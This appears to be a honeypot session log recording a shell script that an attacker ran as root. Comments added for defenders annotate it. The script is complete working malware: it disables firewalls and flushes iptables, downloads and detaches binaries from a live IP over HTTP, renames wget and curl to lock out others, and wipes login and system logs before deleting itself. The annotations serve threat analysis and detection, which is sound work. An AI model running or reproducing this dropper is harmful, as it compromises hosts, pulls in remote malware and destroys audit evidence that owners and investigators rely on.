| IP | 23.160.56.194 |
| Country | US |
| Username | root |
| Shell | banking |
| Exec Command | #!/bin/sh
# Pick a working directory: /tmp is the default, then the first entry in the
# list below that the current user can write to replaces it.
# Defender note: the list goes beyond temp locations (/usr, /bin, /home, /root),
# so files dropped by this script may sit in system paths when it runs as root.
wdir="/tmp"
for i in "/tmp" "/var/tmp" "/dev/shm" "/usr" "/bin" "/home" "/root"; do
if [ -w "$i" ]; then
wdir="$i"
break
fi
done
# Stop immediately if the chosen directory cannot be entered.
cd "$wdir" || exit 1
# disable_firewall: turns off host-based packet filtering.
# Takes no arguments. Every command discards its output and no exit status is
# checked, so each step is best-effort and silent.
# Defender note: a stop/disable of firewalld or ufw followed by iptables
# policies reset to ACCEPT and a rule flush is a strong host indicator; audit
# rules on these binaries and a periodic check of the live ruleset catch it.
disable_firewall() {
# Stop the firewalld and ufw units and prevent them from starting at boot.
systemctl stop firewalld ufw >/dev/null 2>&1
systemctl disable firewalld ufw >/dev/null 2>&1
# Same stop request through the `service` wrapper, for hosts without systemctl.
service firewalld stop >/dev/null 2>&1
service ufw stop >/dev/null 2>&1
if command -v iptables >/dev/null 2>&1; then
# Default policy of the three filter chains becomes ACCEPT ...
iptables -P INPUT ACCEPT >/dev/null 2>&1
iptables -P FORWARD ACCEPT >/dev/null 2>&1
iptables -P OUTPUT ACCEPT >/dev/null 2>&1
# ... then all rules are flushed (-F) and user-defined chains deleted (-X),
# first in the default (filter) table, then in the nat table.
iptables -F >/dev/null 2>&1
iptables -X >/dev/null 2>&1
iptables -t nat -F >/dev/null 2>&1
iptables -t nat -X >/dev/null 2>&1
fi
}
# Runs before any download is attempted, so filtering is already removed by then.
disable_firewall
# download_and_run: fetches a file and starts it as a detached background process.
# Arguments: $1 - URL to fetch
#            $2 - file name to save as in the current directory
# Returns:   0 early when the file already exists and is executable; otherwise
#            the status of the last command run (nothing is checked).
# Defender note: observable behaviour is a wget/curl process with certificate
# checking disabled, followed by chmod +x and a setsid launch of a file in a
# writable directory. All output is discarded, so process and file telemetry
# are the only traces.
download_and_run() {
target_url="$1"
target_name="$2"
# A copy that is already present and executable is started without downloading.
if [ -f "./$target_name" ] && [ -x "./$target_name" ]; then
setsid "./$target_name" >/dev/null 2>&1 &
return 0
fi
exec_bin=""
exec_args=""
# Downloader selection. `good` and `cool` are tried first and are called with
# wget-style and curl-style arguments respectively; they are the names that
# lock_tools in this script gives to wget and curl, so finding them points to
# a host this script has already run on.
# wget flags: no certificate check, quiet, -O output file.
# curl flags: -s silent, -k no certificate check, -L follow redirects.
if command -v good >/dev/null 2>&1; then
exec_bin="good"
exec_args="--no-check-certificate -q $target_url -O $target_name"
elif command -v cool >/dev/null 2>&1; then
exec_bin="cool"
exec_args="-skL $target_url -o $target_name"
elif command -v wget >/dev/null 2>&1; then
exec_bin="wget"
exec_args="--no-check-certificate -q $target_url -O $target_name"
elif command -v curl >/dev/null 2>&1; then
exec_bin="curl"
exec_args="-skL $target_url -o $target_name"
fi
# No downloader found: try to install wget and curl through apt-get and yum.
# Defender note: an unexpected package-manager run is itself worth alerting on.
if [ -z "$exec_bin" ]; then
apt-get update >/dev/null 2>&1 && apt-get install -y wget curl >/dev/null 2>&1
yum install -y wget curl >/dev/null 2>&1
# Only wget is looked for after the install attempt.
if command -v wget >/dev/null 2>&1; then
exec_bin="wget"
exec_args="--no-check-certificate -q $target_url -O $target_name"
fi
fi
if [ -n "$exec_bin" ]; then
# Left unquoted so the shell splits exec_args into separate arguments.
$exec_bin $exec_args >/dev/null 2>&1
# The file's existence is the only check; its content is not verified.
if [ -f "$target_name" ]; then
chmod +x "$target_name"
# setsid plus `&` starts it in a new session, detached from this shell.
setsid "./$target_name" >/dev/null 2>&1 &
fi
fi
}
# lock_tools: renames the system's wget and curl binaries to `good` and `cool`
# in the directory where they are found.
# Takes no arguments; failures are silent.
# NOTE(review): the purpose is presumably to keep other parties from using
# wget/curl on the host while this script can still find them under the new
# names; the script itself does not state intent.
# Defender note: wget/curl missing from PATH while `good`/`cool` exist next to
# where they used to be is a host indicator. Recovery is renaming the files
# back or reinstalling the packages after verifying the binaries.
lock_tools() {
# Clear the immutable attribute on the two binaries so the rename can succeed.
command -v chattr >/dev/null 2>&1 && chattr -i /usr/bin/wget /usr/bin/curl >/dev/null 2>&1
w_path=$(which wget 2>/dev/null)
if [ -n "$w_path" ]; then
case "$w_path" in
# Path already contains "good": nothing to do.
*good*) ;;
*) mv "$w_path" "$(dirname "$w_path")/good" >/dev/null 2>&1 ;;
esac
fi
c_path=$(which curl 2>/dev/null)
if [ -n "$c_path" ]; then
case "$c_path" in
# Path already contains "cool": nothing to do.
*cool*) ;;
*) mv "$c_path" "$(dirname "$c_path")/cool" >/dev/null 2>&1 ;;
esac
fi
}
# Download host. It is the same address as the connecting IP recorded for this
# session, and the transfers use plain HTTP.
# Indicators from these lines: requests for /p.txt and /r.txt on that host, and
# local files named ygl_task_p and ygl_task_r. The .txt extension is on the URL
# only; the saved files are made executable and run.
SERVER_IP="23.160.56.194"
download_and_run "http://$SERVER_IP/p.txt" "ygl_task_p"
download_and_run "http://$SERVER_IP/r.txt" "ygl_task_r"
# wget/curl are renamed only after both downloads have been attempted.
lock_tools
# cleanup: overwrites local login and system logs, then deletes this script.
# Takes no arguments.
# Defender note: `echo >` replaces each log's content with a single newline, so
# affected files shrink to one byte rather than disappearing. A sudden size
# drop on these paths is detectable with file-integrity monitoring, and logs
# shipped off-host before this runs are unaffected.
cleanup() {
# Login records (wtmp, btmp, lastlog) and the syslog/auth.log text logs.
for log in /var/log/wtmp /var/log/btmp /var/log/lastlog /var/log/syslog /var/log/auth.log; do
if [ -f "$log" ]; then
echo > "$log" 2>/dev/null
fi
done
# Removes the script file itself; processes already started keep running.
rm -f "$0"
}
# Final step: log overwrite and self-deletion happen after the payloads were launched.
cleanup
exit 0 |
| Score | - |
| Connected | 2026-02-22 13:48:38 UTC |
| Disconnected | 2026-02-22 13:48:38 UTC |
Session 97dda522-22b9-4870-90f9-ec3f0d0a586f
No recorded events for this session.